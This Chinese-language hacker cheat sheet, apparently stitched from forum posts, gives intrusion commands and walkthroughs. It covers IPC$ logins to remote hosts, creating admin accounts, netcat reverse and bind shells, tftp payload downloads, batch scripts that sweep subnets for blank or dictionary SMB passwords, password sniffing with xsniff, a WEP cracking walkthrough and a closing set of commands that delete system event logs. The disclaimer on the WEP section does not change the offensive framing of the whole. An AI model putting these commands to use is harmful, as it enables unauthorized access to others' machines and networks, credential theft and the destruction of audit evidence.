关于xscan破解邮箱的信息

hacker|
179

局域网视频

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:

net use h: \\ip\c$ 登陆后映射对方C:到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup ***istrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:***istrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务;(如:net start telnet, net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C:共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况,常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)

move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖

fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令

at id号 开启已注册的某个计划任务

at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止

at id号 /delete 停止某个已注册的计划任务

at 查看所有的计划任务

at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机

finger username @host 查看最近有哪些用户登陆

telnet ip 端口 远和登陆服务器,默认端口为23

open ip 连接到IP(属telnet登陆后的命令)

telnet 在本机上直接键入telnet 将进入本机的telnet

copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件

copy c:\srv.exe \\ip\***$ 复制本地c:\srv.exe到对方的***下

cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

copy \\ip\***$\svv.exe c:\ 或:copy\\ip\***$\*.* 复制对方***i$共享下的srv.exe文件(所有文件)至本地C:

xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件

tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送

tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机

ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface

arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息

start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令

mem 查看cpu使用情况

attrib 文件名(目录名) 查看某文件(目录)的属性

attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性

dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间

date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间

set 指定环境变量名称=要指派给变量的字符 设置环境变量

set 显示当前所有的环境变量

set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量

pause 暂停批处理程序,并显示出:请按任意键继续....

if 在批处理程序中执行条件处理(更多说明见if命令及变量)

goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)

call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)

for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)

echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置

echo 信息 在屏幕上显示出信息

echo 信息 pass.txt 将"信息"保存到pass.txt文件中

findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello

find 文件名 查找某文件

title 标题名字 更改CMD窗口标题名字

color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白

prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )

ver 在DOS窗口下显示版本信息

winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)

format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS

md 目录名 创建目录

replace 源文件 要替换文件的目录 替换文件

ren 原文件名 新文件名 重命名文件名

tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称

type 文件名 显示文本文件的内容

more 文件名 逐屏显示输出文件

doskey 要锁定的命令=字符

doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=

taskmgr 调出任务管理器

chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上的错误

tlntadmn telnt服务admn,键入tlntadmn选择3,再选择8,就可以更改telnet服务默认端口23为其它任何端口

exit 退出cmd.exe程序或目前,用参数/B则是退出当前批处理脚本而不是cmd.exe

path 路径\可执行文件的文件名 为可执行文件设置一个路径。

cmd 启动一个win2K命令解释窗口。参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /?

regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入,无任何提示;

regedit /e 注册表文件名 导出注册表

cacls 文件名 参数 显示或修改文件访问控制列表(ACL)——针对NTFS格式时。参数:/D 用户名:设定拒绝某用户访问;/P 用户名erm 替换指定用户的访问权限;/G 用户名erm 赋予指定用户访问权限;Perm 可以是: N 无,R 读取, W 写入, C 更改(写入),F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。

cacls 文件名 查看文件的访问用户权限列表

REM 文本内容 在批处理文件中添加注解

netsh 查看或更改本地网络配置情况

IIS服务命令:

iisreset /reboot 重启win2k计算机(但有提示系统将重启信息出现)

iisreset /start或stop 启动(停止)所有Internet服务

iisreset /restart 停止然后重新启动所有Internet服务

iisreset /status 显示所有Internet服务状态

iisreset /enable或disable 在本地系统上启用(禁用)Internet服务的重新启动

iisreset /rebootonerror 当启动、停止或重新启动Internet服务时,若发生错误将重新开机

iisreset /noforce 若无法停止Internet服务,将不会强制终止Internet服务

iisreset /timeout Val在到达逾时间(秒)时,仍未停止Internet服务,若指定/rebootonerror参数,则电脑将会重新开机。预设值为重新启动20秒,停止60秒,重新开机0秒。

FTP 命令: (后面有详细说明内容)

ftp的命令行格式为:

ftp -v -d -i -n -g[主机名] -v 显示远程服务器的所有响应信息。

-d 使用调试方式。

-n 限制ftp的自动登录,即不使用.netrc文件。

-g 取消全局文件名。

help [命令] 或 ?[命令] 查看命令说明

bye 或 quit 终止主机FTP进程,并退出FTP管理方式.

pwd 列出当前远端主机目录

put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中

get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中

mget [remote-files] 从远端主机接收一批文件至本地主机

mput local-files 将本地主机中一批文件传送至远端主机

dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件

ascii 设定以ASCII方式传送文件(缺省值)

bin 或 image 设定以二进制方式传送文件

bell 每完成一次文件传送,报警提示

cdup 返回上一级目录

close 中断与远程服务器的ftp会话(与open对应)

open host[port] 建立指定ftp服务器连接,可指定连接端口

delete 删除远端主机中的文件

mdelete [remote-files] 删除一批文件

mkdir directory-name 在远端主机中建立目录

rename [from] [to] 改变远端主机中的文件名

rmdir directory-name 删除远端主机中的目录

status 显示当前FTP的状态

system 显示远端主机系统类型

user user-name [password] [account] 重新以别的用户名登录远端主机

open host [port] 重新建立一个新的连接

prompt 交互提示模式

macdef 定义宏命令

lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录

chmod 改变远端主机的文件权限

case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母

cd remote-dir 进入远程主机目录

cdup 进入远程主机目录的父目录

! 在本地机中执行交互shell,exit回到ftp环境,如!ls*.zip

MYSQL 命令:

mysql -h主机地址 -u用户名 -p密码 连接MYSQL;如果刚安装好MYSQL,超级用户root是没有密码的。

(例:mysql -h110.110.110.110 -Uroot -P123456

注:u与root可以不用加空格,其它也一样)

exit 退出MYSQL

mysql*** -u用户名 -p旧密码 password 新密码 修改密码

grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)

show databases; 显示数据库列表。刚开始时才两个数据库:mysql和test。mysql库很重要它里面有MYSQL的系统信息,我们改密码和新增用户,实际上就是用这个库进行操作。

use mysql;

show tables; 显示库中的数据表

describe 表名; 显示数据表的结构

create database 库名; 建库

use 库名;

create table 表名 (字段设定列表); 建表

drop database 库名;

drop table 表名; 删库和删表

delete from 表名; 将表中记录清空

select * from 表名; 显示表中的记录

mysqldump --opt schoolschool.bbb 备份数据库:(命令在DOS的\\mysql\\bin目录下执行);注释:将数据库school备份到school.bbb文件,school.bbb是一个文本文件,文件名任取,打开看看你会有新发现。

win2003系统下新增命令(实用部份):

shutdown /参数 关闭或重启本地或远程主机。

参数说明:/S 关闭主机,/R 重启主机, /T 数字 设定延时的时间,范围0~180秒之间, /A取消开机,/M //IP 指定的远程主机。

例:shutdown /r /t 0 立即重启本地主机(无延时)

taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。

参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程。

Linux系统下基本命令: 要区分大小写

uname 显示版本信息(同win2K的 ver)

dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名 查看文件内容

cat abc.txt 往abc.txt文件中写上内容。

more 文件名 以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名 删除文件,rm -a 目录名删除目录及子目录

mkdir 目录名 建立目录

rmdir 删除子目录,目录内没有文档。

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。

ftp ftp连接上某服务器(同win2K)

附:批处理命令与变量

1:for命令及变量 基本格式:

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。

批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加: 来隔开

command_parameters:为特定命令指定参数或命令行开关

IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。

用法举例:

@echo off

echo 用法格式:test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:***istrator | find "命令成功完成" test.txt

存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立***istrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位); 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。

@echo off

echo 用法格式:ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。

2:if命令及变量 基本格式:

IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。

例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。

0 指发现并成功执行(真);1 指没有发现、没执行(假)。

IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。

例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")

IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。

例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。

IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用 括起来,因为del命令要单独一行时才能执行,用上 后就等于是单独一行了;例如:“if exist test.txt. del test.txt. else echo test.txt.missing ”,注意命令中的“.”

(二)系统外部命令(均需下载相关工具):

1、瑞士军刀:nc.exe

参数说明:

-h 查看帮助信息

-d 后台模式

-e prog程序重定向,一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式,用于入站连接

-L 监听模式,连接天闭后仍然继续监听,直到CTR+C

-n IP地址,不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出,用-vv将更详细

-w数字 timeout延时间隔

-z 将输入,输出关掉(用于扫锚时)

基本用法:

nc -nvv 192.168.0.1 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 192.168.0.1 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法:

nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用:nc -l -p 本机端口

在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件到对方主机

备 注:

| 管道命令

或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令

@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中

与的区别 ""指:覆盖;""指:保存到(添加到)。

如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

2、扫锚工具:xscan.exe

基本格式

xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目

其它选项

-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)

用法示例

xscan -host 192.168.1.1-192.168.255.255 -all -active -p 检测192.168.1.1-192.168.255.255网段内主机的所有漏洞,跳过无响应的主机

xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 检测192.168.1.1-192.168.255.255网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机

命令行方式嗅探器: xsniff.exe

可捕获局域网内FTP/SMTP/POP3/HTTP协议密码

参数说明

-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出

用法示例

xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe

参数说明

-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多?/ca

参考资料:

如何获取本机存储的无线网密码?? 如果回答的答案正确追加分数!!!

需要WinAircrackPack

该工具包是一个无线工具的组合包,包括WinAircrack.exe,wzcook.exe,airdecap.exe以及airodump.exe四个程序,这些程序各有各的用。

SSID号发现工具就是airodump.exe。对付 SSID影藏

第一步:解压缩下载的工具包,运行里头的airodump.exe

第二步:选择相应的网卡,输入对应无线网卡前的序号

第三步:输入o或者a选择网卡模式,

第四步:选择搜索频段,输入0是代表所有频段都检测的意思。

第五步:接下来会提示你输入一个保存文件,这样该工具会把所有sniffer下来的数据包放到这个文件中

第六步:only write wep ivs是否只检测WEP加密数据包,我们选择“Y”即可。

第七步:这时会出现一个提示,大概意思就是说目前驱动还不支持,无法进行sniffer的操作。同时浏览器会自动转到一个页面,我们可以通过这个页面下载兼容驱动程序,升级我们的无线网卡让sniffer工具——airodump.exe可以顺利运行

(2)下载无线网卡新驱动:

要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。

第一步:打开的页面地址为,我们通过这个地址下载适合自己网卡的可以使用airodump的驱动。

第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动

第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airodump

四步:再次返回页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可

第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。

第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。

(3)安装无线网卡新驱动:

之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。

第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。

第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。

第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。

第四步:在“驱动程序”标签中点“更新驱动程序”按钮。

第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮

第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。

七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。

第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。

第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续

第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。

第十一步:系统复制必须文件到本地磁盘

第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airodump这个无线网络sniffer工具。

四、总 结:

由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,

开始 轻松破解无线网络WEP

一、使用airodump抓取无线网络数据包并破解SSID名称:

不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airodump来监视无线网络中的数据包。

第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。

第二步:运行airodump.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。

第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。

第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。

第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。

实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。

第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。

第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。

第八步:最后airodump会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。

第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为 15651时就可以看到ESSID号即SSID号为softer了。

至此我们成功的实现了通过airodump找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。

不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airodump搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airodump是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。

另外当数据包没有收集足够多的情况下,airodump会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airodump收集足够多的数据就可以保证显示结果的真实性了。

二、使用WinAircrack破解WEP密文:

虽然我们可以通过airodump来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。

不过airodump收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用 WinAircrack破解airodump收集到的信息前一定保证airodump收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。

第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。

第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。

第三步:这个文件就是上面所提到的airodump保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airodump.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。

第四步:回到general界面,在encryption type处选择WEP。

第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。

第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。

第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.

不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。

另外通过airodump来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airodump收集了几个小时,都可能出现无法获得足够数据包问题。

仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,

大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。

--------------------------------------------------------------------------------

无线网络密码破解

面的工具可以帮助你。你有点电脑基础的话,很容易搞到密码的。

Kismet:一款超强的无线嗅探器

NetStumbler:免费的Windows 802.11嗅探器

GFI LANguard:一款Windows平台上的商业网络安全扫描器

Airsnort:802.11 WEP加密破解工具

无非是扫描 嗅探 破解

与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""

(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"

(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$

(查看远程主机时间) net time \\IP地址

(定时启动某个程序) at \\IP地址 02:18 readme.exe

(查看共享) net view \\IP地址

(查看netbios工作组列表) nbtstat -A IP地址

(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"

(这两条把自己增加到管理员组): net user 用户名 密码 /add

net localgroup Administrators 用户名 /add

(断开连接) net use \\IP地址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\system32\config\*.evt

del C:\winnt\system32\dtclog\*.*

